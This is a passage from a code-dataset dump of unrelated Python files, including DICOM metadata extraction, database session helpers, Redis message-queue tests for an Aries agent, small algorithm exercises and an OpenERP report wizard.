df_without_mask['has_mask'] = 0\n# df_without_mask_sampled = df_without_mask.sample(len(df_with_mask))\n# df = pd.concat([df_with_mask, df_without_mask_sampled])\n# # NOTE: equal number of positive and negative cases are chosen.\n#\n# kfold = StratifiedKFold(total_folds, shuffle=True, random_state=69)\n# train_idx, val_idx = list(kfold.split(\n# df[\"ImageId\"], df[\"has_mask\"]))[fold]\n# train_df, val_df = df.iloc[train_idx], df.iloc[val_idx]\n# df = train_df if phase == \"train\" else val_df\n# # NOTE: total_folds=5 -> train/val : 80%/20%\n#\n# image_dataset = SIIMDataset(df, data_folder, size, mean, std, phase)\n#\n# dataloader = DataLoader(\n# image_dataset,\n# batch_size=batch_size,\n# num_workers=num_workers,\n# pin_memory=True,\n# shuffle=True,\n# )\n# return dataloader\n# import settings\n# data_folder=settings.data_folder\n# train_rle_path=settings.train_rle_path\n#\n#\n# dataloader = provider(\n# fold=0,\n# total_folds=5,\n# data_folder=data_folder,\n# df_path=train_rle_path,\n# phase=\"train\",\n# size=512,\n# mean = (0.485, 0.456, 0.406),\n# std = (0.229, 0.224, 0.225),\n# batch_size=16,\n# num_workers=4,\n# )\n#\n# batch = next(iter(dataloader)) # get a batch from the dataloader\n# images, masks = batch\n# print(images.shape,masks.shape)\n\n# import pydicom\n# import cv2\n# import matplotlib.pyplot as plt\n# import numpy as np\n# path='/home/cooper/PycharmProjects/SIIM/siim-acr-pneumothorax-segmentation/dataset/pneumothorax/dicom-images-test/1.2.276.0.7230010.3.1.2.8323329.580.1517875163.537052/1.2.276.0.7230010.3.1.3.8323329.580.1517875163.537051/1.2.276.0.7230010.3.1.4.8323329.580.1517875163.537053.dcm'\n# image=pydicom.dcmread(path)\n# ndarray=image.pixel_array\n# ndarray=np.array(ndarray,np.uint8)\n# plt.imshow(ndarray)\n# print(ndarray.shape)\n# cv2.imshow('image',ndarray)\n# cv2.waitKey(0)\n# plt.show()\n#\nimport numpy as np\nimport pandas as pd\nimport os\nimport pydicom\nfrom tqdm import 
tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport settings\n\n# import mask utilities\nimport sys\n\n# sys.path.insert(0, '../input/siim-acr-pneumothorax-segmentation')\nfrom utils.mask_functions import rle2mask\n\n\ndef extract_dcm_pixel_array(file_path):\n return pydicom.dcmread(file_path).pixel_array\n\n\ndef extract_dcm_metadata(file_path):\n ds = pydicom.dcmread(file_path)\n d = {}\n for elem in ds.iterall():\n if elem.name != 'Pixel Data' and elem.name != \"Pixel Spacing\":\n d[elem.name.lower().replace(\" \", \"_\").replace(\"'s\", \"\")] = elem.value\n elif elem.name == \"Pixel Spacing\":\n d[\"pixel_spacing_x\"] = elem.value[0]\n d[\"pixel_spacing_y\"] = elem.value[1]\n\n return d\n\n\ndef create_metadataset(df):\n ImageIds = []\n data = []\n all_feats = set()\n\n for index, row in tqdm(df[[\"ImageId\", \"path\"]].drop_duplicates().iterrows()):\n path = row[\"path\"]\n ImageId = row[\"ImageId\"]\n feature_dict = extract_dcm_metadata(path)\n data.append(feature_dict)\n ImageIds.append(ImageId)\n feats = set(feature_dict.keys())\n if len(feats - all_feats) > 0:\n all_feats = all_feats.union(feats)\n\n df_meta = pd.DataFrame(columns=[\"ImageId\"])\n df_meta[\"ImageId\"] = ImageIds\n\n for feat in sorted(all_feats):\n df_meta[feat] = [d[feat] for d in data]\n\n df_meta['patient_age'] = df_meta['patient_age'].map(lambda x: int(x))\n return df_meta\n\n\nDATA_PATH = settings.DATASETDIR\nSAMPLE_SUBMISSION = \"/home/cooper/PycharmProjects/SIIM/siim-acr-pneumothorax-segmentation/sample_submission.csv\"\n\ndf_train = pd.DataFrame([(name.replace(\".dcm\", \"\"), os.path.join(root, name)) for root, dirs, files in\n os.walk(DATA_PATH + \"/dicom-images-train\")\n for name in files if name.endswith((\".dcm\"))], columns=['ImageId', 'path'])\n\ndf_test = pd.DataFrame([(name.replace(\".dcm\", \"\"), os.path.join(root, name)) for root, dirs, files in\n os.walk(DATA_PATH + \"/dicom-images-test\")\n for name in files if name.endswith((\".dcm\"))], columns=['ImageId', 'path'])\n\n\n\ndf_sub = pd.read_csv(SAMPLE_SUBMISSION)\n\ndf_rle = pd.read_csv(DATA_PATH + \"/train-rle.csv\")\ndf_rle = df_rle.rename(columns={' EncodedPixels': 'EncodedPixels'})\ndf_rle[\"EncodedPixels\"] = df_rle[\"EncodedPixels\"].map(lambda x: x[1:])\n\ndf_train = df_train.merge(df_rle, on=\"ImageId\", how=\"left\")\n\nnot_pneumothorax_ImageId = set(\n df_train.query(\"EncodedPixels == '-1' or EncodedPixels.isnull()\", engine='python')[\"ImageId\"])\ndf_train[\"pneumothorax\"] = df_train[\"ImageId\"].map(lambda x: 0 if x in not_pneumothorax_ImageId else 1)\n\ndf_train[\"rle_count\"] = df_train[\"ImageId\"].map(df_rle.groupby([\"ImageId\"]).size())\ndf_train[\"rle_count\"] = df_train[\"rle_count\"].fillna(-1)\n\n## adding dicom metadata\n\ndf_meta = create_metadataset(df_train)\nmeta_feats = [c for c in df_meta.columns if c != \"ImageId\"]\n\ndf_train = df_train.merge(df_meta, on=\"ImageId\", how='left')\ndf_test = df_test.merge(create_metadataset(df_test), on=\"ImageId\", how='left')\n\ndf_train.to_csv(\"train.csv\", index=False)\ndf_test.to_csv(\"test.csv\", index=False)\n\ndf_sub[\"entries\"] = df_sub[\"ImageId\"].map(df_sub.groupby(['ImageId']).size())\n\nprint(\"train-rle: {}, unique ImageId: {}\".format(len(df_rle), len(df_rle[\"ImageId\"].unique())))\nprint(\"train: {}, unique ImageId: {}\".format(len(df_train), len(df_train[\"ImageId\"].unique())))\nprint(\"train ImageId not in rle: {}\".format(\n len(df_train.query(\"EncodedPixels.isnull()\", engine='python'))))\nprint(\"train ImageId with multiple rle: 
{}\".format(\n len(df_train.query(\"rle_count > 1\", engine='python')[\"ImageId\"].unique())))\n\nprint(\"sample_submission: {}, unique ImageId: {}, ImegeId with multiple entries: {}\".format(\n len(df_sub),\n len(df_sub[\"ImageId\"].unique()),\n len(df_sub.query(\"entries > 1\")[\"ImageId\"].unique())\n))\n\nprint(\"test: {}, unique ImageId: {}\".format(len(df_test), len(df_test[\"ImageId\"].unique())))\nprint(\"test ImageId not in sample_submission: {}\".format(\n len(df_test[~ df_test[\"ImageId\"].isin(df_sub[\"ImageId\"])])))\n\n\n\n# print('fasdfsa')","repo_name":"kepengxu/kaggle-tgs-salt","sub_path":"examples/trials/kaggle-tgs-salt/testdir/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":9389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43910453805","text":"from functools import lru_cache\nfrom typing import Iterator\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session, sessionmaker\nfrom sqlalchemy.pool import NullPool\n\nfrom app.core.settings import settings\n\n\n@lru_cache()\ndef get_session_maker() -> sessionmaker:\n engine = sa.create_engine(settings.SQLALCHEMY_DATABASE_URI, poolclass=NullPool)\n session_local = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n return session_local\n\n\ndef get_db() -> Iterator[Session]:\n session_local = get_session_maker()\n session = session_local()\n\n try:\n yield session\n except Exception as exc:\n session.rollback()\n raise exc\n finally:\n session.close()\n","repo_name":"Datbe2001/Course_BE","sub_path":"app/db/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"15894171057","text":"import sys\n\nsys.stdin = open(\"1600말이되고픈원숭이.txt\")\n\nK = int(input())\n\nW, H = map(int, input().split())\n\nboard = [list(map(int, input().split())) for _ in range(H)]\n\nresult = 987654321\ndx = [0,0,-1,1]\ndy = [-1,1,0,0]\n\nhx = [-2,-1,1,2,-2,-1,1,2]\nhy = [-1,-2,-2,-1,1,2,2,1]\n\nvisited = [[[-1 for _ in range(W)] for _ in range(H)] for _ in range(K+1)]\n\ndef monkey(x,y, dist, hmove):\n 1\nmonkey(0,0,1,0)\n\nif result == 987654321:\n result = -1\n\n\n\nprint(result)","repo_name":"Nyapy/TIL","sub_path":"04_algorithm/백준/1600말이되고픈원숭이(찐).py","file_name":"1600말이되고픈원숭이(찐).py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21951230494","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function\n\nfrom flask import request, g\n\nfrom . import Resource\nfrom .. 
import schemas\nimport sqlite3 as sql\n\nclass Room(Resource):\n\n def post(self):\n print(g.json)\n info = g.json\n conn_1 = sql.connect('./database_epic2/roomdb')\n conn1c = conn_1.cursor()\n conn1c.execute(\"\"\"SELECT COUNT(*) FROM room_address\"\"\")\n res1 = conn1c.fetchone()\n rid = res1[0]\n info[\"rid\"] = \"r\"+str(rid)\n conn1c.execute(\"\"\"INSERT INTO room_address (rid,city,surburb,address) VALUES (?,?,?,?)\"\"\",\n (info[\"rid\"],info[\"city\"],info[\"Suburb\"],info[\"Address\"]))\n conn1c.execute(\"SELECT * FROM room_address\")\n conn_1.commit()\n conn1c.close()\n conn_1.close()\n for item in info:\n if info[item] == True:\n info[item] = 1\n elif info[item] == False:\n info[item] = 0\n conn_2 = sql.connect('./database_epic2/roomdb')\n conn2c = conn_2.cursor()\n conn2c.execute(\"\"\"INSERT INTO room (rid,sid,name,slug,type,price,capacity,pets,breakfast,airconditioner,\n carpark,wifi,gym,kitchen,description,url1,url2,url3,url4,url5)\n VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\"\n ,(info[\"rid\"],info[\"sid\"],info[\"name\"],info[\"slug\"],info[\"type\"],info[\"price\"],info[\"capacity\"]\n ,info[\"pets\"],info[\"breakfast\"],info[\"airconditioner\"],info[\"carpark\"],info[\"wifi\"],\n info[\"gym\"],info[\"kitchen\"],info[\"description\"],info[\"url1\"],info[\"url2\"],info[\"url3\"],info[\"url4\"],\n info[\"url5\"]))\n conn2c.execute(\"SELECT * FROM room\")\n print(conn2c.fetchall())\n conn_2.commit()\n conn2c.close()\n conn_2.close()\n return \"Succeed\",200,None\n pass\n","repo_name":"kong-ivy/accommodation_website_backend_code","sub_path":"Service2/app/demo/v2/api/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6142716570","text":"\"\"\"Basic Message Tests\"\"\"\nimport json\nimport time\n\nimport pytest\n\nfrom . 
import FABER, ALICE, RELAY, Agent\n\n\n@pytest.fixture(scope=\"session\")\ndef faber():\n \"\"\"faber agent fixture.\"\"\"\n yield Agent(FABER)\n\n\n@pytest.fixture(scope=\"session\")\ndef alice():\n \"\"\"alice agent fixture.\"\"\"\n yield Agent(ALICE)\n\n\n@pytest.fixture(scope=\"session\")\ndef relay():\n \"\"\"alice agent fixture.\"\"\"\n yield Agent(RELAY)\n\n\nPAYLOAD_B64 = \"\"\"\n eyJwcm90ZWN0ZWQiOiAiZXlKbGJtTWlPaUFpZUdOb1lXTm9ZVEl3Y0c5c2VURXpNRFZmYVdWM\n FppSXNJQ0owZVhBaU9pQWlTbGROTHpFdU1DSXNJQ0poYkdjaU9pQWlRWFYwYUdOeWVYQjBJaX\n dnSW5KbFkybHdhV1Z1ZEhNaU9pQmJleUpsYm1OeWVYQjBaV1JmYTJWNUlqb2dJakZqWjNsMFF\n tMTNNM0V4YUdkaVZ6Qkpiak50U0c4MldXaExUMnRwUnpWRWVUaHJSakpJV2pZeGNUSnZXV00z\n Ym10dVN6bE9TVWMyU0VobFUyTm9lV0VpTENBaWFHVmhaR1Z5SWpvZ2V5SnJhV1FpT2lBaU5FU\n kNTalJhY0RnMU1XZHFlazUwU20xdGIwVTVOMWR4Vm5KWFRqTTJlVnBTWVVkcFpqUkJSM0o0ZD\n FFaUxDQWljMlZ1WkdWeUlqb2dJak5XY0hsU2NVRlpUV3N5Tms1RmMwUXpObU5mWjJnMFZIazB\n aamd3TUd4RFJHRXdNMWxsUlc1bVJYQm1WMmhKTFdkelpFY3RWR1JrTVdWTmFEbFpTWG8zTkhS\n RlN6SnNSMVZhVFhwZk5HdDFkMEpUVWtvMFRGOWhkMVJLUVZWVmQydFRWbmhyTXpSblVWVmZOV\n 2RyZDFSa09FWTFUa0ZsU1U1UVZTSXNJQ0pwZGlJNklDSnFWVkpDUW1OaVQzZzNOa05zVmw4eG\n F6aFJNMjlyVW5KdFJHUTFhM0JwUWlKOWZWMTkiLCAiaXYiOiAiTVdnR3VRNF9ab2dxVVJUbiI\n sICJjaXBoZXJ0ZXh0IjogIlVNTGFQOU13ZF9wOFR1bWdwcVZWQWZTSWZXc1g3a0lWLUR4Rndf\n VHRTQ2pWdTVTbG5RYmtkTVJLd3VyZGI1dmd6Q0tUNUFybFV0WEFMMm1sSUlpUGpSYzVmSzhLc\n 013S0dFemkycEtrdmxDN1EzUXRKWTE5WmVTSjlYMGlUOWxOamNEM25KS0o1bzlkSjhVWGZpNU\n 80ZEtaLWxlVy1qOHlzTEFTSTh1eEZYVVNoUmxlNy03bm5HZkZnRlZBRjNaWVpqNlRXUUJrdkd\n SUk96TzMwTHNEWHBzalNqMWZfd056RWdxTmpPMERZemRKa0lBNm1BQ1AiLCAidGFnIjogImVB\n ZVFiakktVmpkN21hcWdTNElGTlEifQ==\n\"\"\"\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef established_connection(faber, alice):\n \"\"\"Established connection filter.\"\"\"\n invite = alice.create_invitation(auto_accept=\"true\")[\"invitation\"]\n resp = faber.receive_invite(invite, auto_accept=\"true\")\n yield resp[\"connection_id\"]\n\n\n@pytest.mark.asyncio\nasync def test_base_redis_keys_are_set(redis):\n time.sleep(1)\n assert await redis.lrange(\"acapy-record-base\", 0, -1) != []\n assert await redis.lrange(\"acapy-record-with-state-base\", 0, -1) != []\n\n\n@pytest.mark.asyncio\nasync def test_outbound_queue_removes_messages_from_queue_and_deliver_sends_them(faber: Agent, established_connection: str, redis):\n faber.send_message(established_connection, \"Hello Alice\")\n faber.send_message(established_connection, \"Another Alice\")\n msg_received = False\n retry_pop_count = 0\n while not msg_received:\n msg = await redis.blpop(\"acapy_outbound\", 2)\n if not msg:\n if retry_pop_count > 3:\n raise Exception(\"blpop call failed to retrieve message\")\n retry_pop_count = retry_pop_count + 1\n time.sleep(1)\n msg_received = True\n messages = faber.retrieve_basicmessages()['results']\n assert \"Hello Alice\" in (msg['content'] for msg in messages)\n assert \"Another Alice\" in (msg['content'] for msg in messages)\n\n\n@pytest.mark.asyncio\nasync def test_deliverer_pulls_messages_from_queue_and_sends_them(\n faber: Agent,\n established_connection: str,\n redis\n):\n test_msg = \"eyJjb250ZW50IjogInRlc3QtbXNnIn0=\" # {\"content\": \"test-msg\"}\n outbound_msg = {\n \"service\": {\"url\": f\"{faber.url}/connections/{established_connection}/send-message\"},\n \"payload\": test_msg,\n }\n await redis.rpush(\n \"acapy_outbound\",\n str.encode(json.dumps(outbound_msg)),\n )\n\n time.sleep(5)\n messages = faber.retrieve_basicmessages()['results']\n matching_msgs = [\n msg for msg in messages if msg['content'] 
== \"test-msg\"]\n assert matching_msgs.__len__() == 2 # 1 for sent, 1 for received\n assert await redis.lrange(\"acapy_outbound\", 0, -1) == []\n\n\n@pytest.mark.asyncio\nasync def test_relay_has_keys_in_recip_key_uid_map(redis, relay: Agent):\n time.sleep(1)\n recip_keys = await redis.hgetall(\"recip_key_uid_map\")\n assert recip_keys\n msg_count = await redis.hgetall(\"uid_recip_key_pending_msg_count\")\n assert msg_count\n\n\n@pytest.mark.asyncio\nasync def test_deliverer_retry_on_failure(\n faber: Agent,\n established_connection: str,\n redis,\n):\n outbound_msg = {\n \"service\": {\"url\": \"http://alice:3002/fake/\"},\n \"payload\": PAYLOAD_B64,\n }\n # produce a outbound message with bad endpoint\n await redis.rpush(\n \"acapy_outbound\",\n str.encode(json.dumps(outbound_msg)),\n )\n # assume failure code 400, delay queue, and failure code 400 ...\n time.sleep(1)\n msg = await redis.blpop(\"acapy_outbound\", 10)\n assert msg\n # check for manual commit of previous message by handling a new message\n faber.send_message(established_connection, 'test-failed-msg')\n msg_received = False\n retry_pop_count = 0\n while not msg_received:\n msg = await redis.blpop(\"acapy_outbound\", 10)\n if not msg:\n if retry_pop_count > 3:\n raise Exception(\"blpop call failed to retrieve message\")\n retry_pop_count = retry_pop_count + 1\n time.sleep(1)\n msg_received = True\n\n assert \"test-failed-msg\" in (msg['content']\n for msg in faber.retrieve_basicmessages()['results'])\n","repo_name":"hyperledger/aries-acapy-plugins","sub_path":"redis_events/integration/tests/test_events.py","file_name":"test_events.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331643729","text":"#Aprobación de créditos\na=int(input(\"Ingrese su sueldo en pesos: \"))\nb=int(input(\"Ingrese su año de nacimiento: \"))\nc=int(input(\"Ingrese su numero de hijos: \"))\nd=int(input(\"Ingrese años de pertenencia en el banco: \"))\ne=input(\"Ingrese S si es soltero, ingrese C si es casado: \")\nf=input(\"Si vive en ciudad escriba U, ingrese R si vive en campo: \")\ng=(\"APROBADO\")\nh=(\"RECHAZADO\")\nif d>10 and c>=2:\n print(g)\nelif e==\"C\" and c>3 and 1962<=b<=1972:\n print(g)\nelif a>2500.000 and e==\"S\" and f==\"U\":\n print(g) \nelif a>3500.000 and d>5:\n print(g)\nelif f==\"R\" and e==\"C\" and c<2:\n print(g)\nelse:\n print(h)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_d71f01397c02c51cf6a36368582a7617.py","file_name":"hito1_ej3_d71f01397c02c51cf6a36368582a7617.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26651475674","text":"def strictlyLarger(base,top,w,h,d):\n return(base <= 0 or top >= len(w) or w[base] > w[top] and h[base] > h[top] and d[base] > d[top])\n\ndef sortByHeight(w,h,d):\n h,w,d = zip(*sorted(zip(h,w,d)))\n return(w,h,d)\n\ndef stackBoxes(w,h,d):\n w,h,d = sortByHeight(w,h,d)\n # max height considering the addition of box\n\n n = len(w) # number of boxes\n stack = [0]\n\n for box in range(1,n):\n for i,top in enumerate(stack):\n # if it can be inserted without removing boxes\n if strictlyLarger(i-1,box,w,h,d) and strictlyLarger(box,i,w,h,d):\n stack.insert(i, box)\n break\n # if can be inserted by removing some boxes\n elif strictlyLarger(box,i,w,h,d):\n # if box taller than base being replaced\n replacedHeight = sum([h[x] for x in stack[:i-1]])\n if h[box] > 
replacedHeight:\n stack = [box] + stack[i:]\n break\n return(sum([h[i] for i in stack]))\n\nif __name__==\"__main__\":\n tInput = (([5,4,3,2,1],[1,2,3,4,5],[9,3,5,1,5]),([1,2,3,4,5],[1,2,3,4,5],[1,2,3,4,5]),([1,2,3,1,5],[2,3,4,4,5],[1,2,3,4,5]))\n tOutput = (1,15,14)\n for i,t in enumerate(tInput):\n print(\"Input: {}\".format(t))\n tres = stackBoxes(t[0],t[1],t[2])\n print(\"Output: {}\".format(tres))\n if tres != tOutput[i]:\n print(\"ERROR: expected {},\".format(tOutput[i]))\n","repo_name":"michlee1337/practice","sub_path":"CTCI/c8_recurAndDp/stackBoxes.py","file_name":"stackBoxes.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73791483768","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 1 19:17:00 2017\n\n@author: cdonnat\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport csv \n\n\npath='/Users/cdonnat/Dropbox/Financial Networks/data/'\n\n#filename='companylist.csv'\nfilename='book_CompanyInfo.csv'\ndef load_sectors(path,filename='book_CompanyInfo.csv'):\n \n CompanyInfo={}\n CompanySector={}\n CompanyIndustry={}\n line=0\n with open(path+filename, 'rb') as f:\n reader = csv.reader(f)\n data= list(reader)\n for i in range(len(data)):\n CompanyInfo[data[i][0]]=[data[i][6],data[i][7]]\n CompanySector[data[i][0]]=[data[i][6]]\n CompanyIndustry[data[i][0]]=[data[i][7]]\n \n CompanySector=pd.DataFrame.from_dict(CompanySector)\n CompanySector.index=['Sector']\n CompanyIndustry=pd.DataFrame.from_dict(CompanyIndustry)\n CompanyIndustry.index=['Industry']\n CompanyInfo=pd.DataFrame.from_dict(CompanyInfo)\n CompanyInfo.index=['Sector','Industry']\n return CompanySector,CompanyIndustry,CompanyInfo\n\n\n\ndef load_sectors2(path,filename='book_CompanyInfo.csv'):\n CompanyInfo=pd.DataFrame.from_csv(path+filename, sep=\",\",header=0)\n cols=CompanyInfo.columns.values\n cols[2:5]=['Sector','Industry','Industry_subgroup']\n CompanyInfo.columns=cols\n index_name=CompanyInfo.index\n \n sectors=pd.DataFrame(np.unique(CompanyInfo.Sector),columns=['Sector'])\n sectors['Sector_key']=sectors.index\n CompanyInfo=CompanyInfo.merge(sectors,right_on='Sector',left_on='Sector',how='left')\n \n industry=pd.DataFrame(np.unique(CompanyInfo.Industry),columns=['Industry'])\n industry['Industry_key']=industry.index\n CompanyInfo=CompanyInfo.merge(industry,right_on='Industry',left_on='Industry',how='left')\n \n \n industry_subgroup=pd.DataFrame(np.unique(CompanyInfo.Industry_subgroup),columns=['Industry_subgroup'])\n industry_subgroup['Industry_subgroup_key']=industry_subgroup.index\n CompanyInfo=CompanyInfo.merge(industry_subgroup,right_on='Industry_subgroup',left_on='Industry_subgroup',how='left')\n CompanyInfo.index=index_name\n return CompanyInfo\n\n\n\ndef deal_with_nans_sectors(CompanyInfo,betas):\n get_nan=CompanyInfo.applymap(lambda x: x=='n/a')\n where_nan=get_nan.sum(0)\n one_miss=list(np.where((where_nan==1))[0])\n two_miss=list(np.where((where_nan==2))[0])\n return CompanyInfo.iloc[:,(where_nan==0)]\n#list_Sectors=set([v for (k,v) in CompanySector.iteritems()])\n#list_Industries=set([v for (k,v) in CompanyIndustry.iteritems()])\n#company_labels={}\n#for (k,v) in CompanySector.iteritems():\n# 
company_labels[k]=[k,v,CompanyIndustry[k]]\n#company_labels.to_csv('company_labels.csv)\n","repo_name":"donnate/Financial-Networks","sub_path":"extract_sectors.py","file_name":"extract_sectors.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15593071176","text":"import time\nfrom osv import osv, fields\nimport pooler\nfrom tools.translate import _\nfrom datetime import datetime\n\nclass outward_commission(osv.osv_memory):\n\n    _name = 'outward.commission'\t\t \n    _columns = {\n        'date':fields.date('Date', required=True),\n        'bl_type': fields.selection([(1, 'KLIS'), (2, 'KKK')], \"BL Type\", help = 'Select BL type', required=True, size=-1),\n        'output_type': fields.selection([(1, 'PDF'), (2, 'XLS')], \"Output Type\", help = 'Select output type', required=True, size=-1),\n    }\n\n    _defaults= {\n        'bl_type': 1,\n        'output_type': 1,\n        'date': lambda *a: time.strftime('%Y-%m-%d'),\n    }\n    def print_report(self, cr, uid, ids, context=None):\n        company=self.pool.get('res.users').browse(cr,uid,uid).company_id\n        comm_obj=self.browse(cr,uid,ids[0],context=context)\n        dtt = datetime.strptime(comm_obj.date, '%Y-%m-%d')\n        \n        \n        report_param={\n            'company_name':company and company.name or '',\n            'address':company.partner_id.complete_address,\n            'tel_fax':company and \"Tel/Fax: %s , %s \" % (company.phone and company.phone or '' , company.fax and company.fax or '' ),\n            'date':comm_obj.date,\n            'cost_month':dtt.strftime('%m-%Y'),\n            'int_cost_month':dtt.month,\n            'int_cost_year':dtt.year,\n        }\n\n        if comm_obj.bl_type ==1:\n            report_name='outward.commission.klis'\n        else:\n            report_name='outward.commission.kkk'\n\n\n        return {\n            'type': 'ir.actions.report.xml',\n            'report_name':report_name,\n            'datas': {'parameters':report_param }\n        }\t\t\n\noutward_commission()\n\n\n\n\n","repo_name":"Thomasmdy/openerp","sub_path":"container_management/wizard/out_ward_commission.py","file_name":"out_ward_commission.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33837985529","text":"\"\"\"\nContains utility functions for turning objects into strings and back.\n\"\"\"\n\nfrom global_variables import ROOT\n\n\ndef _t(tag): return \"<\" + tag + \">\"\n\n\ndef _et(tag): return \"<\\\\\" + tag + \">\"\n\n\ndef create_tag(tag: str, string_to_add) -> str:\n    return _t(tag) + str(string_to_add).replace(\"<\", \"<!\") + _et(tag)\n\n\ndef _find_next_tag_and_tag_end(string: str) -> tuple:\n    tag_start=string.find(\"<\")\n    if string[tag_start+1]==\"\\\\\" :\n        return _find_next_tag_and_tag_end(string[tag_start+1:])\n    end = string.find(\">\")\n    return string[tag_start+1:end], end\n\n\ndef _find_content_and_tag_end(string: str, tag: str) -> tuple:\n    content_end = string.find(_et(tag))\n    tag_end = string[content_end:].find(\">\") + content_end\n    return content_end, tag_end\n\n\ndef _find_tag_and_tag_end(string: str, tag: str) -> tuple:\n    tag_start = string.find(_t(tag))\n    tag_end = string[tag_start:].find(\">\") + tag_start\n    return tag_start, tag_end\n\n\ndef _detag(string: str) -> tuple:\n    to_detag = string\n    result = ()\n    while (len(to_detag) != 0):\n        tag, opening_end = _find_next_tag_and_tag_end(to_detag)\n        content_end, closing_end = _find_content_and_tag_end(to_detag, tag)\n        result += (str(to_detag[opening_end + 1:content_end]),)\n        to_detag = str(to_detag[closing_end + 1:])\n    return result\n\n\ndef list_tags_and_values(string: str) -> list:\n    to_detag = string\n    result = []\n    while len(to_detag)!=0:\n        tag, 
opening_end = _find_next_tag_and_tag_end(to_detag)\n        if tag == '':\n            break\n        content_end, closing_end = _find_content_and_tag_end(to_detag, tag)\n        result += [(tag, str(to_detag[opening_end + 1:content_end]),)]\n        to_detag = str(to_detag[closing_end + 1:])\n    return result\n\n\ndef _detag_given_tag(string: str, tag: str) -> tuple:\n    tag_start, content_start = _find_tag_and_tag_end(string, tag)\n    if tag_start == -1:\n        result = \"\"\n        remainder = string\n        return result, remainder\n    content_end, tag_end = _find_content_and_tag_end(string, tag)\n    result = string[content_start + 1:content_end]\n    result = result.replace(\"<!\", \"<\")\n    remainder = string[:tag_start] + string[tag_end + 1:]\n    return result, remainder\n\n\ndef detag_many(string: str, tags) -> tuple:\n    result = ()\n    for tag in tags:\n        value, string = _detag_given_tag(string, tag)\n        result += (value,)\n    return result\n\n\ndef detag_repeated(string: str, tag: str) -> list:\n    results = []\n    while (_t(tag) in string):\n        result, string = _detag_given_tag(string, tag)\n        results += [result]\n    return results\n\n\ndef get_id_list(string: str) -> list:\n    return [int(a) for a in (list(string[1:-1].split(\",\")))]\n\n\ndef _find_next_file(string: str):\n    ending_of_file_tag = string.find(\"file>\")\n    if ending_of_file_tag == -1:\n        return -1, -1, 0, \"\"\n    reversed_string= string[ending_of_file_tag::-1]\n    order_of_depth = reversed_string.find(\"<\")-1 # AKA amount of ! bangs\n    start_of_file_tag = ending_of_file_tag-1-order_of_depth\n    end_of_closing_tag = string.find(\"\\\\file>\")+6\n    start_of_content = string[start_of_file_tag:end_of_closing_tag].find(\">\")+1\n    end_of_content = -start_of_content-1\n    file_name = string[start_of_file_tag:end_of_closing_tag][start_of_content:end_of_content]\n    return start_of_file_tag, end_of_closing_tag, order_of_depth, file_name\n\n\ndef increase_order(string: str, order: int) -> str:\n    return string.replace(\"<\", \"<\"+\"!\"*order)\n\n\ndef load_files(string: str) -> str:\n    start, end, order, file_name=_find_next_file(string)\n    if start == -1:\n        return string\n    with open(root_path(file_name)) as file:\n        file_content=file.read()\n    return string[:start]+increase_order(file_content, order)+string[end:]\n\n\ndef unroot_path(path: str) -> str:\n    if path is None:\n        return None\n    return path.replace(ROOT, \"\", 1)\n\n\ndef root_path(path: str) -> str:\n    if path is None:\n        return None\n    return ROOT + path\n\n\ndef read_and_clean_file(path: str) -> str:\n    with open(root_path(path)) as file:\n        file_contents = file.read()\n    int_tags = detag_repeated(file_contents, \"int\")\n    file_contents += \"\".join(int_tags)\n    return file_contents\n","repo_name":"0316d07cb3844f37b72d3883269fc780/reimagined-potato","sub_path":"utility/src/string_utils.py","file_name":"string_utils.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19827502505","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef cnj_breaker(cnj):\n\tcnj_regex = re.compile(r'(\\d{7})-(\\d{2}).(\\d{4}).(\\d).(\\d{2}).(\\d{4})')\n\tcnj_result = cnj_regex.search(cnj)\n\tif not cnj_result:\n\t\tprint('nao achei')\n\t\n\treturn cnj_result\n\n\ndef cnj_cleaner(cnj):\n\t\n\treturn cnj.replace('-','').replace('.','') \n\ndef get_params(cnj):\n\tbroken_cnj = cnj_breaker(cnj)\t\n\tclean_cnj = cnj_cleaner(cnj)\n\n\tparams = {\n\t'NNNNNNN':broken_cnj.group(1),\n\t'DD':broken_cnj.group(2),\n\t'AAAA':broken_cnj.group(3),\n\t'T':broken_cnj.group(4),\n\t'TR':broken_cnj.group(5),\n\t'OOOO':broken_cnj.group(6),\n\t'num_unico':clean_cnj\n\t}\n\t\n\treturn params\n\ndef 
